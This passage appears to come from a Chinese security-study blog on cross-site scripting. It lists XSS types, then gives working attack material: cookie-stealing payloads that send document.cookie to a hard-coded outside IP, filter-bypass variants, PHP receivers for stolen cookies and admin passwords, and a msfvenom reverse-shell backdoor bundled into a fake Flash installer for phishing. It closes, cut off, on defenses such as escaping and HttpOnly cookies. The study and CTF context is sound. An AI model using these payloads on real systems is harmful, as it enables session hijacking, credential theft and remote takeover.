wp-elements-66e33ec4e57b1e75d5cf4da9f214a64d\">\u5b58\u50a8\u578bXSS\u653b\u51fb\u6d41\u7a0b\uff1a\u653b\u51fb\u8005\u5c06\u653b\u51fb\u4ee3\u7801\u4e0a\u4f20\u5230\u7f51\u7ad9\u540e\u53f0\u6570\u636e\u5e93\uff0c\u7528\u6237\u8bbf\u95ee\u7f51\u7ad9\u540e\u6536\u5230\u6765\u81ea\u7f51\u7ad9\u5b58\u50a8\u7684\u653b\u51fb\u4ee3\u7801\u5e76\u89e3\u6790\u3001\u6267\u884c\uff0c\u5bf9\u6307\u5b9a\u7684\u670d\u52a1\u5668\u8fdb\u884c\u8bbf\u95ee\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">DOM\u578bXSS<\/h3>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;div class = \"page-content\"&gt;\n    &lt;div id = \"xssd_main\"&gt;\n        &lt;script&gt;\n            function domxss(){\n                var str = document.getElementById(\"text\").value;\n                document.getElementById(\"dom\").innerHTML=\"&lt;a href='\"+str+\"'&gt;what do you see?&lt;\/a&gt;\n            }\n                \/\/\u8bd5\u8bd5\uff1a'&gt;&lt;img src=\"#\" onerror=\"alert('xss')\"&gt;\u5229\u7528\u56fe\u7247\u8def\u5f84\u9519\u8bef\u8c03\u7528\u62a5\u9519\u5904\u7406\u4ece\u800c\u89e6\u53d1alert\u51fd\u6570\n                \/\/\u8bd5\u8bd5\uff1a' onclick=\"alert('xss')\"&gt;\u95ed\u5408\u6389\u539f\u672c\u7684\u7b26\u53f7\n        &lt;\/script&gt;\n        &lt;input id=\"text\" name=\"text\" type=\"text\" value=\"\" \/&gt;\n        &lt;input id=\"button\" type=\"button\" value=\"click me!\" oneclick=\"domxss()\"\/&gt;\n        &lt;div id=\"dom\"&gt;&lt;\/div&gt;\n    &lt;\/div&gt;\n&lt;\/div&gt;<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/mikuhacker.cn\/wp-content\/uploads\/2024\/07\/image-1024x447.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"447\" data-original=\"http:\/\/mikuhacker.cn\/wp-content\/uploads\/2024\/07\/image-1024x447.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-344\"  sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-1e13f791a1eefc86f3260177f3842272\">\u6b64\u65f6\u8f93\u5165\u6846\u5185\u7684\u5185\u5bb9\u4f1a\u4f5c\u4e3a\u751f\u6210\u7684\u8d85\u94fe\u63a5\u7684\u4e00\u90e8\u5206\u62fc\u63a5\u5728&#8221;&lt;a href&#8221;\u4e4b\u540e \u3002\u5728\u8f93\u5165\u6846\u4e2d\u6784\u9020\u8bed\u53e5&#8217;oneclick=&#8221;alert(&#8216;xss&#8217;)&#8221;&gt;\u5373\u53ef\u9020\u6210XSS\u3002\u8fd9\u79cd\u4ec5\u7528\u524d\u7aef\u4ee3\u7801\u4e14\u4e0d\u4e0e\u6570\u636e\u5e93\u4ea4\u4e92\u7684\u653b\u51fb\u79f0\u4e3aDOM\u578bXSS\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/mikuhacker.cn\/wp-content\/uploads\/2024\/07\/image-1.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"856\" height=\"472\" data-original=\"http:\/\/mikuhacker.cn\/wp-content\/uploads\/2024\/07\/image-1.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-346\" style=\"width:840px;height:auto\"  sizes=\"(max-width: 856px) 100vw, 856px\" \/><\/div><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">mXSS\uff08\u7a81\u53d8\u578b\uff09<\/h3>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-800b0631eb91be9e7731d790cc6914f3\">\u7a81\u53d8\u578bXSS\u6307\u539f\u672c\u7684Payload\u63d0\u4ea4\u662f\u4e0d\u4f1a\u4ea7\u751fXSS\u7684\uff0c\u4f46\u56e0\u4e00\u4e9b\u539f\u56e0\uff08\u4f8b\u5982\u53cd\u7f16\u7801\uff09\u5bfc\u81f4Payload\u53d1\u751f\u53d8\u5f02\u5bfc\u81f4\u7684XSS\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">UXSS\uff08\u901a\u7528\u578b\uff09<\/h3>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-755d1991b33b133ef6e66373e587d94a\">UXSS\uff08Universal Cross-Site Scripting\uff09\u662f<strong>\u5229\u7528\u6d4f\u89c8\u5668\u6216\u6d4f\u89c8\u5668\u6269\u5c55\u7684\u6f0f\u6d1e<\/strong>\u6765\u5236\u9020XSS\u5e76\u6267\u884c\u4ee3\u7801\u7684\u653b\u51fb\u65b9\u5f0f\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-6aa89cad1faac94e2a6e20e1b6aad18e\">\u6848\u4f8b\uff1aEdge\u6d4f\u89c8\u5668\u7ffb\u8bd1\u529f\u80fd\u5bfc\u81f4JS\u8bed\u53e5\u88ab\u8c03\u7528\u6267\u884c CVE-2021-34506<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-e4e23ee78ca933e13f849a0c235ae094\">\u5c11\u89c1\uff0c\u51e0\u5e74\u624d\u7206\u4e00\u4e2a\uff0c\u6316\u6398\u96be\u5ea6\u9ad8\uff08\u6bd5\u7adf\u662f\u76f4\u63a5\u6316\u6d4f\u89c8\u5668\u6f0f\u6d1e\u4e86\uff09\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Flash XSS<\/h3>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-8759904a759954923fb55c486f19cde1\">SWF\uff08\u64ad\u653e\u5668\uff09\u5f15\u7528js\u9020\u6210XSS\uff1b<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-f7ce6ce32ffaecd52492c1c04254bd34\">\u6316\u6398\u6d41\u7a0b\uff1a\u5229\u7528JPEXS\u53cd\u7f16\u8bd1\u5de5\u5177<strong>\u53cd\u7f16\u8bd1SWF\u6587\u4ef6<\/strong>\u7136\u540e\u627e<strong>Externallnterface.call\u51fd\u6570<\/strong>\uff08\u7528\u4e8e\u8c03\u7528\u6267\u884cjs\u4ee3\u7801\uff09\uff0c\u5ba1\u8ba1\u627e\u5230\u6f0f\u6d1e\u548c\u53ef\u63a7\u53c2\u6570\u7136\u540e\u6784\u9020Payload\uff1a\/res\/js\/dev\/util_libs\/jPlayer\/Jplayer.swf?jQuery=alert(1))}catch(e){}\/\/<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-8d9c21f421b95af3eb64498feec4da09\">\u66f4\u8be6\u7ec6\u7684\u539f\u7406\u7559\u5230\u4ee3\u7801\u5ba1\u8ba1\u7bc7\u518d\u8bb0\u5f55\u5427\uff0c\u73b0\u5728\u8fd8\u770b\u4e0d\u61c2\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">PDF XSS<\/h3>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-7761592102a67962f79d96300a711762\">PDF XSS\u6d41\u7a0b\uff1aPDF\u7f16\u8f91\u5668\u4e2d\u4fee\u6539\u9875\u9762\u5c5e\u6027\u6dfb\u52a0\u52a8\u4f5c-\u8fd0\u884cJavascript\uff0c\u5199\u5165app.alert(1)\u7136\u540e\u4fdd\u5b58\uff1b\u62d6\u5230\u6d4f\u89c8\u5668\u4e2d\u8fd0\u884c\u5219\u53ef\u4ee5\u89e6\u53d1\uff08\u6709\u4e9b\u6d4f\u89c8\u5668\u4e0d\u652f\u6301\uff09\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-8dff03f8d3f96ebfada54aba56d58ac0\">\u53ef\u4ee5\u4e0a\u4f20\u5230\u7f51\u7ad9\u4e2d\u8ba9\u4eba\u8bbf\u95ee\u8be5pdf\u6587\u4ef6\u89e6\u53d1XSS\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">UTF-7 XSS<\/h3>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-533bc8189929248f3b9f1dcee57bda4f\">UTF-7XSS\u4e0e\u666e\u901aXSS\u7684\u533a\u522b\u5728\u4e8e\u6784\u9020\u7684Payload\u662fUTF-7\u7f16\u7801\u7684\uff0c\u53ea\u9002\u7528\u4e8e\u5728\u65e7\u7248IE\u6d4f\u89c8\u5668\u89e6\u53d1\u4e14\u6709\u4e24\u79cd\u5e94\u7528\u573a\u666f\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>meta\u672a\u6307\u5b9a\u7f16\u7801\uff0c\u7279\u5b9a\u7248\u672cIE\u53d1\u73b0\u5185\u5bb9\u5b58\u5728UTF-7\u7f16\u7801\u5185\u5bb9\u4f1a\u81ea\u52a8\u4ee5UTF-7\u89e3\u7801\u5904\u7406<\/li>\n\n\n\n<li>\u6307\u5b9a\u7f16\u7801\u4e3aUTF-7<\/li>\n<\/ul>\n\n\n\n<p class=\"has-vivid-red-color has-text-color has-link-color wp-elements-6befce91aa1caf7ea2e05e82b01cfd91\">\uff08\u5df2\u8fc7\u65f6\uff09<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">MHTML XSS<\/h3>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-2f96870e7e2a1dbd87b3634c1ae28b0c\">MHTMLXSS\u53ea\u5b58\u5728\u4e8e\u4f4e\u7248\u672c\u7684IE\u4e2d\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-f8185058ccc6991c5eea47f32793a9eb\">MHTML\uff1aMIME HTML\uff08Multipurpose Internet Mail Extension HTML\uff09\uff0c\u628a\u4e00\u4e2a\u591a\u9644\u4ef6\uff08\u56fe\u7247\u3001flash\uff09\u7684\u7f51\u9875\u5185\u5bb9\u4fdd\u5b58\u5230\u5355\u4e00\u6863\u6848\u7684\u6807\u51c6\uff0c\u662f\u7c7b\u4f3c\u4e8eHTTP\u7684\u534f\u8bae\u3002<\/p>\n\n\n\n<p class=\"has-vivid-red-color has-text-color has-link-color wp-elements-6befce91aa1caf7ea2e05e82b01cfd91\">\uff08\u5df2\u8fc7\u65f6\uff09<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">CSS XSS<\/h3>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-58efb6779049296b6d15a33965e1fc98\">\u6e90\u4e8eIE8 Beta2\u4ee5\u524d\u7248\u672c\u652f\u6301\u4f7f\u7528expression\u5728CSS\u4e2d\u5b9a\u4e49\u8868\u8fbe\u5f0f\u6765\u8fbe\u5230\u5efa\u7acb\u5143\u7d20\u95f4\u5c5e\u6027\u95f4\u7684\u8054\u7cfb\u7b49\u4f5c\u7528\uff0c\u6240\u4ee5\u53ef\u4ee5\u901a\u8fc7\u4ee5\u4e0b\u4ee3\u7801\u89e6\u53d1XSS\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;style&gt;\n    body {width:expression(alert(1));:red;}\n&lt;\/style&gt;<\/code><\/pre>\n\n\n\n<p class=\"has-vivid-red-color has-text-color has-link-color wp-elements-6befce91aa1caf7ea2e05e82b01cfd91\">\uff08\u5df2\u8fc7\u65f6\uff09<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">VBScript XSS<\/h3>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-4149dbccd9e18b742fa32b93eadb057c\">VBScript\u4e5f\u662f\u5fae\u8f6f\u51fa\u54c1\uff0c\u4e5f\u5b58\u5728XSS\u89e6\u53d1\u65b9\u5f0f\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;input type=\"button\" onclick'\"VBScript:Document.Write 'You Have Been Hacked'\n\nMsgBox 'xss'\"&gt;<\/code><\/pre>\n\n\n\n<p class=\"has-vivid-red-color has-text-color has-link-color wp-elements-6befce91aa1caf7ea2e05e82b01cfd91\">\uff08\u5df2\u8fc7\u65f6\uff09<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">XSS\u53e6\u7c7b\u653b\u51fb\u624b\u6cd5<\/h3>\n\n\n\n<h4 class=\"wp-block-heading\">\u540e\u53f0\u690d\u5165Cookie&amp;\u8868\u5355\u52ab\u6301\uff08\u6743\u9650\u7ef4\u6301\uff09<\/h4>\n\n\n\n<p class=\"has-vivid-red-color has-text-color has-link-color wp-elements-287ffe6fff0bd84acbfef860249663b6\">\u6761\u4ef6&amp;\u7528\u5904\uff1a\u5df2\u53d6\u5f97\u76f8\u5173WEB\u6743\u9650\u53ef\u4ee5\u4fee\u6539\u540e\u53f0\u6587\u4ef6\uff0c\u4f46\u9700\u8981\u65b9\u6cd5\u7ef4\u6301\u6743\u9650\u6216\u8005\u8fdb\u5165\u7f51\u7ad9\u540e\u53f0\uff08\u83b7\u53d6Cookie\u6216\u8d26\u53f7\u5bc6\u7801\uff09<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>\u5199\u5165\u4ee3\u7801\u5230\u767b\u5f55\u6210\u529f\u6587\u4ef6\uff0c\u5229\u7528beef\u6216xss\u5e73\u53f0\u5b9e\u65f6\u76d1\u63a7Cookie\u7b49\u51ed\u636e\u5b9e\u73b0\u6743\u9650\u7ef4\u6301<\/li>\n\n\n\n<li>\u82e5\u5b58\u5728\u540c\u6e90\u7b56\u7565\u6216\u9632\u62a4\u60c5\u51b5\uff0cCookie\u83b7\u53d6\u5931\u8d25\uff08\u6216\u4e0d\u5168\uff09\uff0c\u5219\u53ef\u91c7\u7528\u8868\u5355\u52ab\u6301\u6216\u6570\u636e\u660e\u6587\u4f20\u8f93\uff1a$up=&lt;script src=&#8221;[\u53d1\u9001\u5230\u653b\u51fb\u673a\u7f51\u7ad9\u7684url]\/get.php?user=&#8217;.$admin_name.&#8217;&amp;password=&#8217;.$admin_password.'&#8221;&gt;&lt;\/script&gt;;echo $up\uff1b\u7136\u540e\u5728\u653b\u51fb\u673a\u7f51\u7ad9\u7684get.php\u4e0b\u5199\u4e2a\u4ee3\u7801\u63a5\u6536\u5f97\u5230\u7684\u8d26\u6237\u3001\u5bc6\u7801<\/li>\n<\/ol>\n\n\n\n<pre class=\"wp-block-code\"><code>\/\/get.php\n&lt;?php\n$name = $_GET&#91;'user'];\n$password = $_GET&#91;'password'];\n$myfile = fopen(\"newfile.txt\",\"w\");\nfwrite($myfile,$name);\nfwrite($myfile,'|');\nfwrite($myfile,$password);\nfwrite($myfile,'\\n');\nfclose($myfile);\n?&gt;<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\">Flash\u9493\u9c7c\u914d\u5408MSF\u6346\u7ed1\u4e0a\u7ebf<\/h4>\n\n\n\n<p class=\"has-vivid-red-color has-text-color has-link-color wp-elements-8b2a85ba8556c5bda789399c82d3e03c\">\u6761\u4ef6\uff1abeef\u4e0a\u7ebf\u53d7\u63a7\u6216\u76f4\u63a5\u9493\u9c7c\uff08\u641esese\uff0c\u5229\u7528xss\u8df3\u8f6c\uff09<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>\u751f\u6210\u540e\u95e8\uff1amsfvenom -p windows\/meterpreter\/reverse_tcp LHOST=xxx LPORT=xxx -f exe &gt; flash.exe<\/li>\n\n\n\n<li>\u505a\u4e00\u4e2a\u4e0b\u8f7dFlash\u6587\u4ef6\u7684\u9493\u9c7c\u7f51\u9875\u540c\u65f6\u8981\u51c6\u5907\u4e00\u4e2a\u6b63\u5e38\u5b98\u65b9\u8f6f\u4ef6-\u4fdd\u8bc1\u5b89\u88c5\u6b63\u5e38<\/li>\n\n\n\n<li>\u628a\u540e\u95e8\u548c\u5b98\u65b9\u8f6f\u4ef6\u538b\u7f29\u6346\u7ed1\u6210\u6587\u4ef6-\u8bbe\u7f6e\u89e3\u538b\u89e3\u538b\u540e\u8fd0\u884c<\/li>\n\n\n\n<li>MSF\u914d\u7f6e\u76d1\u542c\u72b6\u6001<\/li>\n\n\n\n<li>\u8bf1\u4f7f\u53d7\u5bb3\u8005\u8bbf\u95eeURL\uff08\u7535\u5b50\u53d6\u8bc1\u68c0\u6750\u5f04\u6765\u7684\u4f20\u9500\u8bdd\u672f\u6709\u7528\u529b\uff01\uff09<\/li>\n<\/ol>\n\n\n\n<h4 class=\"wp-block-heading\">\u6d4f\u89c8\u5668\u7f51\u9a6c\u914d\u5408MSF\u8bbf\u95ee\u4e0a\u7ebf<\/h4>\n\n\n\n<p class=\"has-vivid-red-color has-text-color has-link-color wp-elements-56aa0c840bcfcbdad149b8ed4a01932c\">\u6761\u4ef6\uff1abeef\u4e0a\u7ebf\u53d7\u63a7\u6216\u76f4\u63a5\u9493\u9c7c\uff08\u9700\u6d4f\u89c8\u5668\u5b58\u57280day\uff0c\u4e0b\u9762\u6f14\u793a\u7684\u5df2\u7ecf\u8fc7\u65f6\uff09<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>\u914d\u7f6eMSF\u751f\u6210URL\uff1ause exploit\/windows\/browser\/ms14_064_ole_code_execution;set allowpowershellprompt true;set target 1;run<\/li>\n\n\n\n<li>\u8bf1\u4f7f\u53d7\u5bb3\u8005\u8bbf\u95eeURL<\/li>\n<\/ol>\n\n\n\n<h3 class=\"wp-block-heading\">XSS\u8fc7\u6ee4\u7ed5\u8fc7<\/h3>\n\n\n\n<p>\u76f8\u5173\u6587\u7ae0\uff1a<a href=\"https:\/\/xz.aliyun.com\/t\/4067?time__1311=n4%2Bxni0QG%3DoCqAKYiKDsD7feymDRhDR00dxRrTD#toc-13\" target=\"_blank\" rel=\"noreferrer noopener\">XSS\u603b\u7ed3 &#8211; \u5148\u77e5\u793e\u533a (aliyun.com)<\/a><\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-8ebd96e04407afd8e9faf316d10d1fe2\">\u9996\u5148\u5728\u653b\u51fb\u673a\u4e0a\u51c6\u5907\u4e00\u4e2aget.php\u7528\u4e8e\u63a5\u6536cookie\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php\n$cookie=$_GET&#91;'Miku'];\n$myfile=fopen(\"cookie.txt\",\"w+\");\nfwrite($myfile,$cookie);\nfclose($myfile);\n?&gt;<\/code><\/pre>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-5c7ad1aa1a8f46fbeeaf973ecfdb9701\">\u6784\u9020\u9875\u9762\u8df3\u8f6cXSS\u8bed\u53e5\u8ba9\u53d7\u5bb3\u8005\u5e26\u7740cookie\u8bbf\u95ee\u5230\u653b\u51fb\u673a\u7684\u6587\u4ef6\uff1a&lt;script&gt;window.location.href=&#8217;http:\/\/47.120.52.135\/get.php?Miku=&#8217;+document.cookie&lt;\/script&gt;<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u53cd\u5c04\u578bXSS\u8fc7\u6ee4&lt;script&gt;<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-fe94812ceacc239fb309d0c0920da898\">\u4f7f\u7528\u5176\u5b83\u8bed\u53e5\uff0c\u4f8b\u5982\u5229\u7528\u62a5\u9519\u5904\u7406\uff1a&lt;img src=1 onerror=window.location.href=&#8217;http:\/\/47.120.52.135\/get.php?Miku=&#8217;+document.cookie&gt;<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-5714e412d7fc36628467d0cca60ce892\">\u5728ctf\u8d5b\u9898\u4e2d\uff0c\u673a\u5668\u4eba\u53ef\u80fd\u4e0d\u4f1a\u89e6\u53d1onerror\u9519\u8bef\u4e8b\u4ef6\u3001onclick\u7b49\u9f20\u6807\u4e8b\u4ef6\u5bfc\u81f4cookie\u83b7\u53d6\u5931\u8d25\uff0c\u6240\u4ee5\u5728ctf\u4e2d\u53ef\u4ee5\u591a\u5c1d\u8bd5\u7528onload\u8f7d\u5165\u4e8b\u4ef6\u6765\u6784\u9020\u8bed\u53e5\uff1a&lt;body onload=window.location.href=&#8217;http:\/\/47.120.52.135\/get.php?Miku=&#8217;+document.cookie&gt;<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u53cd\u5c04\u578bXSS\u8fc7\u6ee4&lt;img&gt;<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-9b5159c65f454f486bfe4468b444608e\">&lt;input onload=&#8221;window.location.href=&#8217;http:\/\/47.120.52.135\/get.php?Miku=&#8217;+document.cookie;&#8221;&gt;<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-1b68d656213af99559a64ec95faa7348\">&lt;svg onload=&#8221;window.location.href=&#8217;http:\/\/47.120.52.135\/get.php?Miku=&#8217;+document.cookie;&#8221;&gt;<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-1318b9efcee492770c6b9835cb655e40\">&lt;body onload=window.location.href=&#8217;http:\/\/47.120.52.135\/get.php?Miku=&#8217;+document.cookie&gt;<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u53cd\u5c04\u578bXSS\u8fc7\u6ee4\u7a7a\u683c<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-7a41ff586c6bed958f377acffbc15a80\">&lt;svg\/onload=&#8221;window.location.href=&#8217;http:\/\/47.120.52.135\/get.php?Miku=&#8217;+document.cookie;&#8221;&gt;<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-798e5eff33008ea4e5be7c3c36baa1c0\">&lt;body\/onload=window.location.href=&#8217;http:\/\/47.120.52.135\/get.php?Miku=&#8217;+document.cookie&gt;<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u5b58\u50a8\u578bXSS\u601d\u8def<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-df5fd18f7105a7104b062835fd4ec139\">\u5728<strong>\u5b58\u5728\u8f93\u51fa\u529f\u80fd<\/strong>\u7684\u5730\u65b9\u63d2\u5165JS\u4ee3\u7801\uff08\u8bc4\u8bba\u533a\u6216\u6ce8\u518c\u65f6\u7684\u8d26\u6237\u540d\uff09\uff1a\u6ce8\u518c\u65f6\u7528JS\u4ee3\u7801\u4f5c\u4e3a\u8d26\u53f7\u6216\u5bc6\u7801\uff0c\u5f53\u7ba1\u7406\u5458<strong>\u67e5\u770b\u7528\u6237\u7ba1\u7406\u754c\u9762\u65f6<\/strong>\u89e6\u53d1XSS\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u5b58\u50a8\u578bCOOKIE\u7684\u51ed\u636e\u5931\u6548\uff0c\u9700\u8981\u4e00\u6b21\u6027\u5b8c\u6210\u64cd\u4f5c<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-126dfb8a51eeb822eecfcd75a34ab7d1\">\u5f97\u5230\u7ba1\u7406\u5458cookie\u65f6\uff0ccookie\u53ef\u80fd<strong>\u5df2\u7ecf\u5931\u6548<\/strong>\uff0c\u6240\u4ee5\u9700\u8981<strong>\u4e00\u6b21\u6027<\/strong>\u5b8c\u6210\u64cd\u4f5c\uff0c\u7528JS\u4ee3\u7801\u6765\u83b7\u53d6\u7ba1\u7406\u5458\u8bbf\u95ee\u9875\u9762<strong>\u5f53\u65f6\u7684\u9875\u9762\u5185\u5bb9<\/strong>\uff08\u76f8\u5173\u8bed\u53e5\u53ef\u4ee5\u5728xss\u5e73\u53f0\u627e\uff0c\u82e5\u5e73\u53f0\u88ab\u9776\u573a\u5e73\u53f0\u5c4f\u853d\u4e86\u5c31\u81ea\u5df1\u6784\u9020\u4e00\u4e2a\uff09\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-b33a4fb92b81bc3656d8474d9a53dda5\">ctfshow\u8bed\u53e5\u4e3e\u4f8b\uff1a&lt;script&gt;$(&#8216;.laytable-cell-1-0-1&#8217;).each(function(index,value){if(value.innerHTML.indexOf(&#8216;ctf&#8217;+&#8217;show&#8217;)&gt;-1){window.location.href=&#8217;http:\/\/47.120.52.135\/get.php?Miku=&#8217;+value.innerHTML;}});&lt;\/script&gt;<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-cd71aad50509b3a7497d908699289bf9\">\u5176\u4e2d&#8217;.laytable-cell-1-0-1&#8217;\u662f\u9898\u76ee\u4e2d\u5bc6\u7801\u4e00\u680f\u7684\u6807\u7b7e\uff0c(&#8216;ctf&#8217;+&#8217;show&#8217;)\u662f\u76f8\u5173\u7684\u503c\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u5b58\u50a8\u578bXSS\u914d\u5408CSRF\u4fee\u6539\u5bc6\u7801<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-deae4d15e230367873cbff0680ee03bf\">\u82e5\u4fee\u6539\u5bc6\u7801<strong>\u9700\u8bbf\u95ee\u67d0\u4e2a\u9875\u9762<\/strong>\uff08\u4f8b\u5982change.php\uff09\u5219\u53ef\u4ee5\u6784\u9020JS\u4ee3\u7801\u8ba9\u8bbf\u95ee\u9875\u9762\u7684\u7528\u6237\uff08\u7ba1\u7406\u5458\uff09\u4fee\u6539\u81ea\u5df1\u7684\u5bc6\u7801\uff08<strong>GET\u65b9\u5f0f<\/strong>\uff09\uff1a&lt;script&gt;window.location.href=&#8217;http:\/\/127.0.0.1\/api\/change.php?p=123&#8242;;&lt;\/script&gt;<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-12ce7c292d04ec19d201fccce82b6ca1\"><strong>POST\u65b9\u5f0f<\/strong>\u63d0\u4ea4\u4fee\u6539\u6570\u636e\u5305\u4ee3\u7801\uff1a&lt;script&gt;$.ajax({url:&#8217;http:\/\/127.0.0.1\/api\/change.php&#8217;,type:&#8217;post&#8217;,data:{p:&#8217;123&#8242;}});&lt;\/script&gt;<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">XSS\u4fee\u590d\u4e0e\u9632\u5fa1(PHP\u4e3e\u4f8b)<\/h3>\n\n\n\n<h4 class=\"wp-block-heading\">\u5339\u914d\u3001\u8fc7\u6ee4\u4e00\u4e9b\u5371\u9669\u5b57\u7b26\u4ee5\u53ca\u8f6c\u4e49\u4e00\u4e9b\u5371\u9669\u5b57\u7b26\uff08&amp;&lt;&gt;&#8221;&#8216;\uff09<\/h4>\n\n\n\n<h4 class=\"wp-block-heading\">\u8bbe\u7f6eHTTP-only Cookie<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-82dd81faaad499c15b8d47645806ae5f\">\u5728php.ini\u4e2d\u8bbe\u7f6e\uff08\u5f00\u542f\u5168\u5c40Cookie\u7684HttpOnly\u5c5e\u6027\uff0c\u9700PHP5.2\u4ee5\u4e0a\u7248\u672c\u53ef\u652f\u6301\u5168\u5c40\u8bbe\u7f6e\uff09\uff1asession.cookie_httponly=1;\u6216\u5728\u4ee3\u7801\u4e2d\u5f15\u7528\uff1aini_set(&#8220;session.cookie_httponly&#8221;,1);\u5bf9\u4e8ePHP5.1\u4ee5\u524d\u7248\u672c\u4ee5\u53caPHP4\u7248\u672c\uff0c\u9700\u901a\u8fc7header\u51fd\u6570\u5b9e\u73b0\uff1a&lt;?php header(&#8220;Set-Cookie:hidden=value;httponOnly&#8221;);?&gt;<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-ffe7f2af8a7a685a4171e599eca7b507\">\u82e5\u662f\u7528Beef\u5219\u4ecd\u7136\u53ef\u4ee5\u83b7\u53d6cookie\uff08beef\u662f\u4ece\u672c\u5730\u83b7\u53d6\uff09\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u8bbe\u7f6eCSP\uff08Content Security 